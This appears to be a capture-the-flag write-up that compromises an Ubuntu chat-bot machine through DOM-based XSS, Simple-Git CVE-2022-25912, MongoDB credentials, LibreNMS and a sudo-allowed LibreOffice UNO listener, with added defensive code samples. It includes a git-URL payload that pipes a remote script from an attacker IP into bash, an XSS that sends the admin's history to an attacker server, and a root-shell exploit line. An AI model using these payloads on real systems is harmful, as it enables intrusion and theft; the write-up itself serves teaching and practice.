This is an Ubuntu 22.04 machine running a chat bot accessible via a web page. The site is vulnerable to DOM-based XSS, which once exploited allows discovery of a hidden subdomain made with Simple-Git 3.14. It turns out this Simple-Git version is vulnerable (CVE-2022-25912), which leads to a first reverse shell on the system, and by enumerating the contents of the local MongoDB we disclose credentials to move laterally to another user with rights to read the user flag. Regarding privilege escalation, we first need to move laterally to another user by abusing functionality of a running LibreNMS 22.10.0 server, then check the sudo configuration, where a LibreOffice binary with a vulnerable Apache UNO API is allowed to be executed as root.
KEYWORDS
DOM-XSS, DOM Invader, Simple-Git 3.14, CVE-2022-25912, MongoDB, LibreNMS 22.10.0, LibreOffice, Apache UNO API, sudo escalation.
Enumerating the web server with Firefox, a login portal comes into view.
Create a new account and log in. In the chatbox, it seems we can issue the command help to see "some buildin commands". Also, it seems we can see a conversation log by typing the command history.
In addition to this, there is a "Contact Us" form which apparently puts us in touch with the site administrator.
USER
In the enumeration phase we have found out the history command permits us to see our previous commands, but it would be great if we could see another user's commands (particularly admin commands).
Let's investigate whether the chat application and the contact form could be entry points for DOM-based XSS. This vulnerability arises when client-side JavaScript running in the user's browser takes data we control (a source) and writes it into the page through an unsafe function (a sink), so we are able to inject and execute code that manipulates the DOM.
The DOM (Document Object Model) is a hierarchical tree representation of the page HTML elements created by the browser when a web page is loaded. It is useful for developers since they can manipulate web page elements interacting with the DOM with a scripting language such as JavaScript (via developers API and browser console). Here is a good tutorial on the DOM manipulation with JavaScript: https://www.youtube.com/playlist?list=PL4cUxeGkcC9gfoKa5la9dsdCNpuey2s-V
In order to find DOM-based vulnerabilities we will use Burp Suite's DOM Invader. Open Burp Suite's integrated browser and enable the DOM Invader extension, then navigate to the chat application and open the developer tools (F12). In the DOM Invader tab, click on "Inject forms"; the tool will automatically inject the canary into every form on the page. Finally, click on "Submit"; DOM Invader will automatically check whether the source reaches any sink function.
In this case, DOM Invader reports the innerHTML sink. Click on the stack trace link to find the function location.
Inspecting the code, it seems we have found the chat application source code, which is vulnerable to DOM-based XSS.
There you can see the innerHTML sink previously reported by DOM Invader. Basically, this JavaScript application takes the user message and, if it is not empty, sends it to the server (socket.emit).
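As an added example (not the target's chat.js), here is the innerHTML sink DOM Invader flagged, written beside two safe alternatives and an escaping helper. The function names (appendMessageUnsafe, appendMessageSafe, escapeHtml, renderMessageHtml) and the sample message are ours; the `doc` parameter is injectable so the safe renderer can be exercised outside a browser.

```javascript
// Added example (not the target's chat.js): the innerHTML sink DOM Invader
// reported, shown beside two safe alternatives and an escaping helper.
// Names (appendMessageUnsafe, appendMessageSafe, escapeHtml) are ours.

// Vulnerable pattern, equivalent to what chat.js does: the message string is
// parsed as HTML, so any tag or event handler inside it becomes live DOM.
function appendMessageUnsafe(container, message) {
  container.innerHTML += `<p class="msg">${message}</p>`;
}

// Safe alternative 1: create the node and assign the message as text.
// textContent is a text sink, not an HTML sink; the browser never parses it.
// `doc` is injectable so the function can be exercised outside a browser.
function appendMessageSafe(container, message, doc = globalThis.document) {
  const p = doc.createElement("p");
  p.className = "msg";
  p.textContent = message;
  container.appendChild(p);
  return p;
}

// Safe alternative 2: when an HTML string is unavoidable (server-side
// templating, or legacy code that must keep innerHTML), escape the five
// characters that can change HTML structure before interpolating.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

function renderMessageHtml(message) {
  return `<p class="msg">${escapeHtml(message)}</p>`;
}

// Constructed sample: a chat message carrying markup with an event handler.
const SAMPLE_MESSAGE = '<img src=x onerror="alert(1)">';

// Returns both renderings so the difference is visible: the unsafe string
// still contains a live <img> tag, the escaped one does not.
function compareRenderings(message = SAMPLE_MESSAGE) {
  const unsafe = `<p class="msg">${message}</p>`;
  const safe = renderMessageHtml(message);
  return { unsafe, safe, safeContainsTag: /<img/i.test(safe) };
}
```

The first alternative is the one to prefer in browser code such as chat.js: building the node and assigning textContent removes the sink entirely, whereas escaping only works as long as every interpolation site remembers to call it.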
Once a DOM-XSS vulnerability has been confirmed, we have to elaborate ways of exploiting it. Let's recapitulate what we have so far:
In the chat.js code we have seen how to send messages to the server.
We know this application is vulnerable to DOM-XSS, meaning we can manipulate the DOM and therefore the page code.
Also, the "Contact Us" can be used to send messages which will be read by the admin.
Let's prepare and send a script in the "Contact Us" form which, once read by the admin, will dump the admin's history and send it to a web server controlled by us. Since we have already disclosed the chat.js code used to send messages to the server, we will just copy and paste the lines we need.
Start a Python HTTP server, then minify the script, base64-encode it and send it with Repeater, decoding it with the atob() JavaScript function (remember to add escape characters before the " character).
The admin's chat history is received on your HTTP server.
Back to Firefox, enter the PoC payload ext::sh -c curl% http://10.10.xxx.xxx|bash in the "Enter Remote Git URL" text box.
A reverse shell for user www-data is received on port 1919.
Move to the directory /var/www/app/configuration and enumerate the file connect_db.js.
> cat connect_db.js
import mongoose from "mongoose";

const connectDB = async (URL_DATABASE) => {
  try {
    const DB_OPTIONS = { dbName: "testing" }
    mongoose.connect(URL_DATABASE, DB_OPTIONS)
    console.log("Connected Successfully TO Database")
  } catch (error) {
    console.log(`Error Connecting to the ERROR ${error}`);
  }
}
Looks like a script to connect to a Mongo database called testing. Use the local client to connect to the Mongo service, then switch to the testing database and enumerate the collections. Dump the users collection.
Investigating in the support forums (https://community.librenms.org), they say you can run commands from the /opt/librenms directory. For example, you can check the version with validate.php.
> ./validate.php
===========================================
Component | Version
--------- | -------
LibreNMS  | 22.10.0 (2022-10-18T04:47:05+00:00)
DB Schema | 2022_09_03_091314_update_ports_adsl_table_with_defaults (246)
PHP       | 8.1.2-1ubuntu2.14
Python    | 3.10.12
Database  | MariaDB 10.6.16-MariaDB-0ubuntu0.22.04.1
RRDTool   | 1.7.2
SNMP      | 5.9.1
===========================================
[OK]    Installed from package; no Composer required
[FAIL]  'install_dir' config setting is not set correctly.
        [FIX] It should probably be set to: /opt/librenms
So the version running is 22.10.0. Back in GitHub, download a copy of the source code package for version 22.10.0 and inspect the source code. There are two PHP files that catch our attention: adduser.php and config_to_json.php.
Disclose the configuration data by executing /opt/librenms/config_to_json.php.
This /usr/bin/soffice LibreOffice binary launches the Calc application (the LibreOffice spreadsheet program, similar to Excel).
The flag --accept="socket,host=localhost,port=2002;urp;" enables a socket for remote communication with LibreOffice, listening on localhost (the same machine) on port 2002 using URP (UNO remote protocol).
The flag --headless runs LibreOffice in "headless" mode, meaning it operates without a graphical user interface (GUI).
In summary, the command launches LibreOffice's Calc application and sets up a socket listener on port 2002 for batch processing, automation or scripting tasks. The listener performs no authentication of its own: any process able to reach the port can drive the office instance with the privileges of the user it runs as.
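As an added example that is not part of the original writeup, the following audit helper parses an soffice command line like the one found on the box and correlates it with sudo rules, rating the exposure the way a defender reviewing the host would. The launcher path /opt/scripts/office.sh, the user name and the sudo output are constructed placeholders (the writeup does not give the real path), and the function names (parseAcceptFlag, parseSudoRules, assessSoffice) are ours.

```javascript
// Added example, not from the original writeup: an audit helper that parses an
// soffice command line like the one on the box and correlates it with sudo
// rules. The launcher path /opt/scripts/office.sh and the sudo output are
// constructed placeholders; the writeup does not give the real path.

// Parse the --accept="socket,host=...,port=...;urp;" value into its parts.
// Returns null when the command line does not start a UNO listener.
function parseAcceptFlag(cmdline) {
  const m = cmdline.match(/--accept=["']?([^"'\s]+)/);
  if (!m) return null;
  const [connection, protocol = ""] = m[1].split(";");
  const [transport, ...kvs] = connection.split(",");
  const params = Object.fromEntries(kvs.map((kv) => kv.split("=")));
  return {
    transport,                               // "socket" or "pipe"
    host: params.host ?? "",
    port: params.port ? Number(params.port) : null,
    protocol,                                // "urp"
  };
}

// Parse "sudo -l"-style output into {runas, nopasswd, command} rules.
function parseSudoRules(sudoOutput) {
  const rules = [];
  for (const line of sudoOutput.split("\n")) {
    const m = line.match(/^\s*\(([^)]+)\)\s+(NOPASSWD:\s*)?(.+)$/);
    if (m) rules.push({ runas: m[1].trim(), nopasswd: Boolean(m[2]), command: m[3].trim() });
  }
  return rules;
}

// Combine both views and rate the exposure. A UNO socket has no
// authentication of its own, so what matters is who can reach it and which
// account the listening process runs as.
function assessSoffice(cmdline, sudoOutput, launcherPath) {
  const accept = parseAcceptFlag(cmdline);
  if (!accept) return { severity: "none", accept: null, findings: [] };
  const findings = [
    `UNO listener: ${accept.transport} ${accept.host}:${accept.port} (${accept.protocol})`,
  ];
  let severity = "low";
  if (accept.transport === "socket") {
    findings.push("TCP socket: every local process can connect, no credentials required");
    severity = "medium";
  }
  if (accept.transport === "socket" && !["localhost", "127.0.0.1"].includes(accept.host)) {
    findings.push(`bound to ${accept.host}: reachable from the network as well`);
    severity = "high";
  }
  if (/\s--headless(\s|$)/.test(cmdline)) {
    findings.push("headless: no interactive user would notice the session being used");
  }
  const rootRules = parseSudoRules(sudoOutput).filter(
    (r) => r.runas === "root" && r.command === launcherPath
  );
  if (rootRules.length > 0) {
    findings.push(
      `sudo lets a low-privileged user start the listener as root via ${launcherPath}` +
        (rootRules[0].nopasswd ? " (NOPASSWD)" : "")
    );
    severity = "high";
  }
  return { severity, accept, findings };
}

// Constructed inputs modelled on the writeup's description of the box.
const SAMPLE_CMDLINE =
  '/usr/bin/soffice --calc --accept="socket,host=localhost,port=2002;urp;" --headless';
const SAMPLE_SUDO_OUTPUT = [
  "User someuser may run the following commands on this host:",
  "    (root) NOPASSWD: /opt/scripts/office.sh",
].join("\n");

function auditSample() {
  return assessSoffice(SAMPLE_CMDLINE, SAMPLE_SUDO_OUTPUT, "/opt/scripts/office.sh");
}
```

Running auditSample() rates the sample configuration "high" because two conditions coincide: the listener accepts unauthenticated connections from any local process, and a sudo rule lets an unprivileged account start it as root. Either fix breaks the chain: drop the sudo rule (or run the launcher as a dedicated low-privileged service account), or switch the --accept value to a named pipe (pipe,name=...) whose permissions limit who can connect.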
The exploit needs to be modified in its last line: just add the executable you want to be run as root. In our case, it will be an msfvenom ELF shell which we will have previously transferred to the host at path /var/tmp/shell.
shell_execute.execute("/var/tmp/shell","",1)
Then transfer the exploit.py to the host and execute the office.sh shell script with sudo to initiate the LibreOffice server.